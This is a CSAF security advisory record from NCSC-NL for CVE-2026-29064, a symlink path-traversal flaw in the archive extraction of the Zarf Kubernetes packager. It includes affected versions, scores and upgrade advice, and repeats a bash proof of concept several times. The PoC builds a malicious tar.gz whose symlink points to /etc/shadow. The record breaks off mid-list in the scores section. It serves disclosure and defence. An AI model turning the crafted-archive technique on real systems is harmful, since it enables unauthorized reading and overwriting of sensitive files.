{
"document": {
"category": "csaf_base",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE"
}
},
"lang": "en",
"notes": [
{
"category": "legal_disclaimer",
"text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
}
],
"publisher": {
"category": "coordinator",
"contact_details": "cert@ncsc.nl",
"name": "National Cyber Security Centre",
"namespace": "https://www.ncsc.nl/"
},
"title": "CVE-2026-29064",
"tracking": {
"current_release_date": "2026-03-26T01:48:00.962217Z",
"generator": {
"date": "2026-02-17T15:00:00Z",
"engine": {
"name": "V.E.L.M.A",
"version": "1.7"
}
},
"id": "CVE-2026-29064",
"initial_release_date": "2026-03-06T16:38:38.592163Z",
"revision_history": [
{
"date": "2026-03-06T16:38:38.592163Z",
"number": "1",
"summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1)."
},
{
"date": "2026-03-06T16:38:40.330481Z",
"number": "2",
"summary": "NCSC Score created."
},
{
"date": "2026-03-06T17:26:39.552233Z",
"number": "3",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)."
},
{
"date": "2026-03-06T17:26:43.747059Z",
"number": "4",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-06T19:39:02.721451Z",
"number": "5",
"summary": "Unknown change."
},
{
"date": "2026-03-06T22:39:34.157250Z",
"number": "6",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
},
{
"date": "2026-03-06T22:39:40.471211Z",
"number": "7",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-07T00:13:02.354564Z",
"number": "8",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (3).| CWES updated (1)."
},
{
"date": "2026-03-07T14:47:10.094425Z",
"number": "9",
"summary": "Source created.| CVE status created. (valid)| EPSS created."
},
{
"date": "2026-03-07T14:47:12.252148Z",
"number": "10",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-11T01:25:00.470218Z",
"number": "11",
"summary": "Products created (1).| Product Identifiers created (1).| Exploits created (1)."
},
{
"date": "2026-03-11T01:25:09.850794Z",
"number": "12",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-12T00:43:25.215385Z",
"number": "13",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-19T15:29:21.313640Z",
"number": "14",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
},
{
"date": "2026-03-19T15:29:23.594224Z",
"number": "15",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-20T09:35:46.361718Z",
"number": "16",
"summary": "Source connected.| CVE status created. (valid)| EPSS created."
},
{
"date": "2026-03-25T18:14:23.567938Z",
"number": "17",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (3)."
},
{
"date": "2026-03-25T18:14:26.466962Z",
"number": "18",
"summary": "NCSC Score updated."
},
{
"date": "2026-03-25T21:42:48.954362Z",
"number": "19",
"summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (42).| References created (4).| CWES updated (1)."
}
],
"status": "interim",
"version": "19"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/>=0.54.0|<0.73.1",
"product": {
"name": "vers:unknown/>=0.54.0|<0.73.1",
"product_id": "CSAFPID-5783973",
"product_identification_helper": {
"cpe": "cpe:2.3:a:lfprojects:zarf:*:*:*:*:*:*:*:*"
}
}
}
],
"category": "product_name",
"name": "zarf"
}
],
"category": "vendor",
"name": "lfprojects"
},
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/>=0.54.0|<0.73.1",
"product": {
"name": "vers:unknown/>=0.54.0|<0.73.1",
"product_id": "CSAFPID-5766944"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/nightly",
"product": {
"name": "vers:unknown/nightly",
"product_id": "CSAFPID-5910237"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.54.0",
"product": {
"name": "vers:unknown/v0.54.0",
"product_id": "CSAFPID-5910238"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.55.0",
"product": {
"name": "vers:unknown/v0.55.0",
"product_id": "CSAFPID-5910239"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.55.1",
"product": {
"name": "vers:unknown/v0.55.1",
"product_id": "CSAFPID-5910240"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.55.2",
"product": {
"name": "vers:unknown/v0.55.2",
"product_id": "CSAFPID-5910241"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.55.3",
"product": {
"name": "vers:unknown/v0.55.3",
"product_id": "CSAFPID-5910242"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.55.4",
"product": {
"name": "vers:unknown/v0.55.4",
"product_id": "CSAFPID-5910243"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.55.5",
"product": {
"name": "vers:unknown/v0.55.5",
"product_id": "CSAFPID-5910244"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.55.6",
"product": {
"name": "vers:unknown/v0.55.6",
"product_id": "CSAFPID-5910245"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.56.0",
"product": {
"name": "vers:unknown/v0.56.0",
"product_id": "CSAFPID-5910246"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.57.0",
"product": {
"name": "vers:unknown/v0.57.0",
"product_id": "CSAFPID-5910247"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.58.0",
"product": {
"name": "vers:unknown/v0.58.0",
"product_id": "CSAFPID-5910248"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.58.0-rc1",
"product": {
"name": "vers:unknown/v0.58.0-rc1",
"product_id": "CSAFPID-5910249"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.59.0",
"product": {
"name": "vers:unknown/v0.59.0",
"product_id": "CSAFPID-5910250"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.60.0",
"product": {
"name": "vers:unknown/v0.60.0",
"product_id": "CSAFPID-5910251"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.60.0-rc1",
"product": {
"name": "vers:unknown/v0.60.0-rc1",
"product_id": "CSAFPID-5910252"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.61.0",
"product": {
"name": "vers:unknown/v0.61.0",
"product_id": "CSAFPID-5910253"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.61.0-rc1",
"product": {
"name": "vers:unknown/v0.61.0-rc1",
"product_id": "CSAFPID-5910254"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.61.1",
"product": {
"name": "vers:unknown/v0.61.1",
"product_id": "CSAFPID-5910255"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.61.2",
"product": {
"name": "vers:unknown/v0.61.2",
"product_id": "CSAFPID-5910256"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.62.0",
"product": {
"name": "vers:unknown/v0.62.0",
"product_id": "CSAFPID-5910257"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.63.0",
"product": {
"name": "vers:unknown/v0.63.0",
"product_id": "CSAFPID-5910258"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.63.0-rc1",
"product": {
"name": "vers:unknown/v0.63.0-rc1",
"product_id": "CSAFPID-5910259"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.64.0",
"product": {
"name": "vers:unknown/v0.64.0",
"product_id": "CSAFPID-5910260"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.65.0",
"product": {
"name": "vers:unknown/v0.65.0",
"product_id": "CSAFPID-5910261"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.65.0-rc1",
"product": {
"name": "vers:unknown/v0.65.0-rc1",
"product_id": "CSAFPID-5910262"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.65.1",
"product": {
"name": "vers:unknown/v0.65.1",
"product_id": "CSAFPID-5910263"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.66.0",
"product": {
"name": "vers:unknown/v0.66.0",
"product_id": "CSAFPID-5910264"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.67.0",
"product": {
"name": "vers:unknown/v0.67.0",
"product_id": "CSAFPID-5910265"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.67.0-rc1",
"product": {
"name": "vers:unknown/v0.67.0-rc1",
"product_id": "CSAFPID-5910266"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.68.0",
"product": {
"name": "vers:unknown/v0.68.0",
"product_id": "CSAFPID-5910267"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.68.1",
"product": {
"name": "vers:unknown/v0.68.1",
"product_id": "CSAFPID-5910268"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.69.0",
"product": {
"name": "vers:unknown/v0.69.0",
"product_id": "CSAFPID-5910269"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.69.0-rc1",
"product": {
"name": "vers:unknown/v0.69.0-rc1",
"product_id": "CSAFPID-5910270"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.70.0",
"product": {
"name": "vers:unknown/v0.70.0",
"product_id": "CSAFPID-5910271"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.70.1",
"product": {
"name": "vers:unknown/v0.70.1",
"product_id": "CSAFPID-5910272"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.71.0",
"product": {
"name": "vers:unknown/v0.71.0",
"product_id": "CSAFPID-5910273"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.71.1",
"product": {
"name": "vers:unknown/v0.71.1",
"product_id": "CSAFPID-5910274"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.72.0",
"product": {
"name": "vers:unknown/v0.72.0",
"product_id": "CSAFPID-5910275"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.72.0-rc1",
"product": {
"name": "vers:unknown/v0.72.0-rc1",
"product_id": "CSAFPID-5910276"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.73.0",
"product": {
"name": "vers:unknown/v0.73.0",
"product_id": "CSAFPID-5910277"
}
},
{
"category": "product_version_range",
"name": "vers:unknown/v0.73.1-rc1",
"product": {
"name": "vers:unknown/v0.73.1-rc1",
"product_id": "CSAFPID-5910278"
}
}
],
"category": "product_name",
"name": "zarf"
}
],
"category": "vendor",
"name": "zarf-dev"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-29064",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"
},
"notes": [
{
"category": "description",
"text": "Zarf is an Airgap Native Packager Manager for Kubernetes. From version 0.54.0 to before version 0.73.1, a path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package. This issue has been patched in version 0.73.1.",
"title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-29064"
},
{
"category": "description",
"text": "Zarf is an Airgap Native Packager Manager for Kubernetes. From version 0.54.0 to before version 0.73.1, a path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package. This issue has been patched in version 0.73.1.",
"title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-29064"
},
{
"category": "description",
"text": "### Summary\n\nA path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package.\n\n### What users should do\nUpgrade immediately to version v0.73.1\n\nIf developers cannot upgrade immediately, only process Zarf packages from fully trusted sources until the fix is applied.\n\nIf using trusted packages and archives - the only impact to this is updating zarf binary or SDK package versions. Previously created packages do not need to be rebuilt.\n\n### Who is affected\n\n- Any user of affected Zarf versions who processes packages from untrusted or semi-trusted sources. This includes packages received via file transfer, downloaded from registries, or shared across organizational boundaries. This includes use of the `zarf tools archiver decompress` functionality on generic archives.\n\n- Any SDK consumers of Zarf for the affected versions who utilize package load or archive operations. \n\n### What is the risk\n\nA malicious Zarf package or archive could create symlinks pointing to arbitrary locations on the filesystem. This could lead to unauthorized file reads, file overwrites, or in some scenarios, code execution on the system performing the extraction in the event a file on the system is both overwritten and executed. This vulnerability does not introduce an execution path explicitly.\n\n### Mitigating Factors\n\nIf developers only process trusted packages and/or trusted archives (with `zarf tools archiver decompress), the risk is low. \n\n### Details\n\nThe archive extraction code in src/pkg/archive/archive.go creates symlinks from archive entries without validating that the symlink target resolves within the extraction destination directory. This affects all three extraction handler functions:\n\n1. defaultHandler (on line 320): Joins `dst` with `f.LinkTarget`, but does not verify the resolved path stays under `dst`. This means that a LinkTarget of `\"../../../../etc/shadow\"` would resolve outside the destination after `filepath.Join`.\n2. stripHandler (on line 342): Passes `f.LinkTarget` verbatim to `os.Symlink`.\n3. filterHandler (on line 370): Similar to `defaultHandler`, the code joins but does not validate the `LinkTarget`.\n\nThe vulnerability is a symlink variant of the \"Zip Slip\" class (CVE-2018-1002200). An attacker constructs a Zarf package containing an archive entry with a malicious `f.LinkTarget`. When the package is extracted, `os.Symlink` creates a symlink pointing outside the extraction root. A subsequent archive entry targeting the same name can then read or write through the symlink to an arbitrary location on the filesystem.\n\n### PoC\n\n\nProof of Concept
\nYou may want to follow through these steps inside of a disposable environment (container, VM):\n\n```bash\nReproduction via zarf tools archiver decompress (simplest)\n\nThis demonstrates the vulnerability using the defaultHandler (line 320).\n\n# 1. Create a staging directory for the malicious archive contents.\nmkdir -p /tmp/cve-repro/archive-contents\n\n# 2. Create a symlink that traverses out of the extraction directory.\n# This symlink targets \"../../../../../../../etc/shadow\" relative to\n# whatever extraction destination is chosen.\ncd /tmp/cve-repro/archive-contents\nln -s ../../../../../../../etc/shadow escape-link\n\n# 3. Also create a regular file so the archive isn't empty besides the link.\necho \"benign content\" > readme.txt\n\n# 4. Package into a tar.gz archive.\n# The --dereference flag is NOT used, so the symlink is stored as-is.\ncd /tmp/cve-repro\ntar -czf malicious.tar.gz -C archive-contents .\n\n# 5. Verify the archive contains the symlink.\ntar -tvf malicious.tar.gz\n# Expected output includes:\n# lrwxrwxrwx ... ./escape-link -> ../../../../../../../etc/shadow\n\n# 6. Create the extraction destination (deeply nested so the traversal\n# resolves to a real path).\nmkdir -p /tmp/cve-repro/extract/a/b/c/d\n\n# 7. Run the vulnerable extraction.\nzarf tools archiver decompress malicious.tar.gz /tmp/cve-repro/extract/a/b/c/d\n\n# 8. Verify the symlink was created pointing outside the destination.\nls -la /tmp/cve-repro/extract/a/b/c/d/escape-link\n# Expected: escape-link /etc/shadow\n#\n# The symlink target resolves to /etc/shadow, which is OUTSIDE\n# the extraction directory /tmp/cve-repro/extract/a/b/c/d/.\n\nreadlink -f /tmp/cve-repro/extract/a/b/c/d/escape-link\n# Expected: /etc/shadow\n\nWhat happened: defaultHandler (line 320) executed:\nos.Symlink(filepath.Join(dst, f.LinkTarget), target)\n// = os.Symlink(\"/tmp/cve-repro/extract/a/b/c/d/../../../../../../../etc/shadow\",\n// \"/tmp/cve-repro/extract/a/b/c/d/escape-link\")\nfilepath.Join cleans the path to /etc/shadow, which is outside dst. No validation is performed.\n```\n ",
"title": "github - https://github.com/advisories/GHSA-hcm4-6hpj-vghm"
},
{
"category": "description",
"text": "### Summary\n\nA path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package.\n\n### What users should do\nUpgrade immediately to version v0.73.1\n\nIf developers cannot upgrade immediately, only process Zarf packages from fully trusted sources until the fix is applied.\n\nIf using trusted packages and archives - the only impact to this is updating zarf binary or SDK package versions. Previously created packages do not need to be rebuilt.\n\n### Who is affected\n\n- Any user of affected Zarf versions who processes packages from untrusted or semi-trusted sources. This includes packages received via file transfer, downloaded from registries, or shared across organizational boundaries. This includes use of the `zarf tools archiver decompress` functionality on generic archives.\n\n- Any SDK consumers of Zarf for the affected versions who utilize package load or archive operations. \n\n### What is the risk\n\nA malicious Zarf package or archive could create symlinks pointing to arbitrary locations on the filesystem. This could lead to unauthorized file reads, file overwrites, or in some scenarios, code execution on the system performing the extraction in the event a file on the system is both overwritten and executed. This vulnerability does not introduce an execution path explicitly.\n\n### Mitigating Factors\n\nIf developers only process trusted packages and/or trusted archives (with `zarf tools archiver decompress), the risk is low. \n\n### Details\n\nThe archive extraction code in src/pkg/archive/archive.go creates symlinks from archive entries without validating that the symlink target resolves within the extraction destination directory. This affects all three extraction handler functions:\n\n1. defaultHandler (on line 320): Joins `dst` with `f.LinkTarget`, but does not verify the resolved path stays under `dst`. This means that a LinkTarget of `\"../../../../etc/shadow\"` would resolve outside the destination after `filepath.Join`.\n2. stripHandler (on line 342): Passes `f.LinkTarget` verbatim to `os.Symlink`.\n3. filterHandler (on line 370): Similar to `defaultHandler`, the code joins but does not validate the `LinkTarget`.\n\nThe vulnerability is a symlink variant of the \"Zip Slip\" class (CVE-2018-1002200). An attacker constructs a Zarf package containing an archive entry with a malicious `f.LinkTarget`. When the package is extracted, `os.Symlink` creates a symlink pointing outside the extraction root. A subsequent archive entry targeting the same name can then read or write through the symlink to an arbitrary location on the filesystem.\n\n### PoC\n\n\nProof of Concept
\nYou may want to follow through these steps inside of a disposable environment (container, VM):\n\n```bash\nReproduction via zarf tools archiver decompress (simplest)\n\nThis demonstrates the vulnerability using the defaultHandler (line 320).\n\n# 1. Create a staging directory for the malicious archive contents.\nmkdir -p /tmp/cve-repro/archive-contents\n\n# 2. Create a symlink that traverses out of the extraction directory.\n# This symlink targets \"../../../../../../../etc/shadow\" relative to\n# whatever extraction destination is chosen.\ncd /tmp/cve-repro/archive-contents\nln -s ../../../../../../../etc/shadow escape-link\n\n# 3. Also create a regular file so the archive isn't empty besides the link.\necho \"benign content\" > readme.txt\n\n# 4. Package into a tar.gz archive.\n# The --dereference flag is NOT used, so the symlink is stored as-is.\ncd /tmp/cve-repro\ntar -czf malicious.tar.gz -C archive-contents .\n\n# 5. Verify the archive contains the symlink.\ntar -tvf malicious.tar.gz\n# Expected output includes:\n# lrwxrwxrwx ... ./escape-link -> ../../../../../../../etc/shadow\n\n# 6. Create the extraction destination (deeply nested so the traversal\n# resolves to a real path).\nmkdir -p /tmp/cve-repro/extract/a/b/c/d\n\n# 7. Run the vulnerable extraction.\nzarf tools archiver decompress malicious.tar.gz /tmp/cve-repro/extract/a/b/c/d\n\n# 8. Verify the symlink was created pointing outside the destination.\nls -la /tmp/cve-repro/extract/a/b/c/d/escape-link\n# Expected: escape-link /etc/shadow\n#\n# The symlink target resolves to /etc/shadow, which is OUTSIDE\n# the extraction directory /tmp/cve-repro/extract/a/b/c/d/.\n\nreadlink -f /tmp/cve-repro/extract/a/b/c/d/escape-link\n# Expected: /etc/shadow\n\nWhat happened: defaultHandler (line 320) executed:\nos.Symlink(filepath.Join(dst, f.LinkTarget), target)\n// = os.Symlink(\"/tmp/cve-repro/extract/a/b/c/d/../../../../../../../etc/shadow\",\n// \"/tmp/cve-repro/extract/a/b/c/d/escape-link\")\nfilepath.Join cleans the path to /etc/shadow, which is outside dst. No validation is performed.\n```\n ",
"title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-hcm4-6hpj-vghm.json?alt=media"
},
{
"category": "description",
"text": "### Summary\n\nA path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package.\n\n### What users should do\nUpgrade immediately to version v0.73.1\n\nIf developers cannot upgrade immediately, only process Zarf packages from fully trusted sources until the fix is applied.\n\nIf using trusted packages and archives - the only impact to this is updating zarf binary or SDK package versions. Previously created packages do not need to be rebuilt.\n\n### Who is affected\n\n- Any user of affected Zarf versions who processes packages from untrusted or semi-trusted sources. This includes packages received via file transfer, downloaded from registries, or shared across organizational boundaries. This includes use of the `zarf tools archiver decompress` functionality on generic archives.\n\n- Any SDK consumers of Zarf for the affected versions who utilize package load or archive operations. \n\n### What is the risk\n\nA malicious Zarf package or archive could create symlinks pointing to arbitrary locations on the filesystem. This could lead to unauthorized file reads, file overwrites, or in some scenarios, code execution on the system performing the extraction in the event a file on the system is both overwritten and executed. This vulnerability does not introduce an execution path explicitly.\n\n### Mitigating Factors\n\nIf developers only process trusted packages and/or trusted archives (with `zarf tools archiver decompress), the risk is low. \n\n### Details\n\nThe archive extraction code in src/pkg/archive/archive.go creates symlinks from archive entries without validating that the symlink target resolves within the extraction destination directory. This affects all three extraction handler functions:\n\n1. defaultHandler (on line 320): Joins `dst` with `f.LinkTarget`, but does not verify the resolved path stays under `dst`. This means that a LinkTarget of `\"../../../../etc/shadow\"` would resolve outside the destination after `filepath.Join`.\n2. stripHandler (on line 342): Passes `f.LinkTarget` verbatim to `os.Symlink`.\n3. filterHandler (on line 370): Similar to `defaultHandler`, the code joins but does not validate the `LinkTarget`.\n\nThe vulnerability is a symlink variant of the \"Zip Slip\" class (CVE-2018-1002200). An attacker constructs a Zarf package containing an archive entry with a malicious `f.LinkTarget`. When the package is extracted, `os.Symlink` creates a symlink pointing outside the extraction root. A subsequent archive entry targeting the same name can then read or write through the symlink to an arbitrary location on the filesystem.\n\n### PoC\n\n\nProof of Concept
\nYou may want to follow through these steps inside of a disposable environment (container, VM):\n\n```bash\nReproduction via zarf tools archiver decompress (simplest)\n\nThis demonstrates the vulnerability using the defaultHandler (line 320).\n\n# 1. Create a staging directory for the malicious archive contents.\nmkdir -p /tmp/cve-repro/archive-contents\n\n# 2. Create a symlink that traverses out of the extraction directory.\n# This symlink targets \"../../../../../../../etc/shadow\" relative to\n# whatever extraction destination is chosen.\ncd /tmp/cve-repro/archive-contents\nln -s ../../../../../../../etc/shadow escape-link\n\n# 3. Also create a regular file so the archive isn't empty besides the link.\necho \"benign content\" > readme.txt\n\n# 4. Package into a tar.gz archive.\n# The --dereference flag is NOT used, so the symlink is stored as-is.\ncd /tmp/cve-repro\ntar -czf malicious.tar.gz -C archive-contents .\n\n# 5. Verify the archive contains the symlink.\ntar -tvf malicious.tar.gz\n# Expected output includes:\n# lrwxrwxrwx ... ./escape-link -> ../../../../../../../etc/shadow\n\n# 6. Create the extraction destination (deeply nested so the traversal\n# resolves to a real path).\nmkdir -p /tmp/cve-repro/extract/a/b/c/d\n\n# 7. Run the vulnerable extraction.\nzarf tools archiver decompress malicious.tar.gz /tmp/cve-repro/extract/a/b/c/d\n\n# 8. Verify the symlink was created pointing outside the destination.\nls -la /tmp/cve-repro/extract/a/b/c/d/escape-link\n# Expected: escape-link /etc/shadow\n#\n# The symlink target resolves to /etc/shadow, which is OUTSIDE\n# the extraction directory /tmp/cve-repro/extract/a/b/c/d/.\n\nreadlink -f /tmp/cve-repro/extract/a/b/c/d/escape-link\n# Expected: /etc/shadow\n\nWhat happened: defaultHandler (line 320) executed:\nos.Symlink(filepath.Join(dst, f.LinkTarget), target)\n// = os.Symlink(\"/tmp/cve-repro/extract/a/b/c/d/../../../../../../../etc/shadow\",\n// \"/tmp/cve-repro/extract/a/b/c/d/escape-link\")\nfilepath.Join cleans the path to /etc/shadow, which is outside dst. No validation is performed.\n```\n ",
"title": "github - https://api.github.com/advisories/GHSA-hcm4-6hpj-vghm"
},
{
"category": "description",
"text": "Zarf's symlink targets in archives are not validated against destination directory in github.com/zarf-dev/zarf",
"title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4636.json?alt=media"
},
{
"category": "description",
"text": "Zarf is an Airgap Native Packager Manager for Kubernetes. From version 0.54.0 to before version 0.73.1, a path traversal vulnerability in archive extraction allows a specifically crafted Zarf package to create symlinks pointing outside the destination directory, enabling arbitrary file read or write on the system processing the package. This issue has been patched in version 0.73.1.",
"title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-29064.json?alt=media"
},
{
"category": "other",
"text": "0.00013",
"title": "EPSS"
},
{
"category": "other",
"text": "3.9",
"title": "NCSC Score"
},
{
"category": "other",
"text": "Exploit code publicly available, There is exploit data available from source Nvd",
"title": "NCSC Score top decreasing factors"
}
],
"product_status": {
"known_affected": [
"CSAFPID-5766944",
"CSAFPID-5783973",
"CSAFPID-5910237",
"CSAFPID-5910238",
"CSAFPID-5910239",
"CSAFPID-5910240",
"CSAFPID-5910241",
"CSAFPID-5910242",
"CSAFPID-5910243",
"CSAFPID-5910244",
"CSAFPID-5910245",
"CSAFPID-5910246",
"CSAFPID-5910247",
"CSAFPID-5910248",
"CSAFPID-5910249",
"CSAFPID-5910250",
"CSAFPID-5910251",
"CSAFPID-5910252",
"CSAFPID-5910253",
"CSAFPID-5910254",
"CSAFPID-5910255",
"CSAFPID-5910256",
"CSAFPID-5910257",
"CSAFPID-5910258",
"CSAFPID-5910259",
"CSAFPID-5910260",
"CSAFPID-5910261",
"CSAFPID-5910262",
"CSAFPID-5910263",
"CSAFPID-5910264",
"CSAFPID-5910265",
"CSAFPID-5910266",
"CSAFPID-5910267",
"CSAFPID-5910268",
"CSAFPID-5910269",
"CSAFPID-5910270",
"CSAFPID-5910271",
"CSAFPID-5910272",
"CSAFPID-5910273",
"CSAFPID-5910274",
"CSAFPID-5910275",
"CSAFPID-5910276",
"CSAFPID-5910277",
"CSAFPID-5910278"
]
},
"references": [
{
"category": "external",
"summary": "Source - cveprojectv5",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29064"
},
{
"category": "external",
"summary": "Source raw - cveprojectv5",
"url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/29xxx/CVE-2026-29064.json"
},
{
"category": "external",
"summary": "Source - nvd",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29064"
},
{
"category": "external",
"summary": "Source raw - nvd",
"url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-29064"
},
{
"category": "external",
"summary": "Source - github",
"url": "https://github.com/advisories/GHSA-hcm4-6hpj-vghm"
},
{
"category": "external",
"summary": "Source raw - github",
"url": "https://api.github.com/advisories/GHSA-hcm4-6hpj-vghm"
},
{
"category": "external",
"summary": "Source - osv",
"url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-hcm4-6hpj-vghm.json?alt=media"
},
{
"category": "external",
"summary": "Source - first",
"url": "https://api.first.org/data/v1/epss?cve=CVE-2026-29064"
},
{
"category": "external",
"summary": "Source raw - first",
"url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
},
{
"category": "external",
"summary": "Source - github",
"url": "https://api.github.com/advisories/GHSA-hcm4-6hpj-vghm"
},
{
"category": "external",
"summary": "Source - first",
"url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
},
{
"category": "external",
"summary": "Source - osv",
"url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4636.json?alt=media"
},
{
"category": "external",
"summary": "Source - osv",
"url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-29064.json?alt=media"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; github; nvd; osv",
"url": "https://github.com/zarf-dev/zarf/security/advisories/GHSA-hcm4-6hpj-vghm"
},
{
"category": "external",
"summary": "Reference - cveprojectv5; github; nvd; osv",
"url": "https://github.com/zarf-dev/zarf/releases/tag/v0.73.1"
},
{
"category": "external",
"summary": "Reference - github; osv",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29064"
},
{
"category": "external",
"summary": "Reference - github",
"url": "https://github.com/advisories/GHSA-hcm4-6hpj-vghm"
},
{
"category": "external",
"summary": "Reference - osv",
"url": "https://github.com/CVEProject/cvelistV5/tree/main/cves/2026/29xxx/CVE-2026-29064.json"
}
],
"scores": [
{
"cvss_v3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N",
"baseScore": 8.2,
"baseSeverity": "HIGH"
},
"products": [
"CSAFPID-5766944",
"CSAFPID-5783973",
"CSAFPID-5910237",
"CSAFPID-5910238",
"CSAFPID-5910239",
"CSAFPID-5910240",
"CSAFPID-5910241",
"CSAFPID-5910242",
"CSAFPID-5910243",
"CSAFPID-5910244",
"CSAFPID-5910245",
"CSAFPID-5910246",
"CSAFPID-5910247",
"CSAFPID-5910248",
"CSAFPID-5910249",
"CSAFPID-5910250",
"CSAFPID-5910251",
"CSAFPID-5910252",
"CSAFPID-5910253",
"CSAFPID-5910254",
"CSAFPID-5910255",
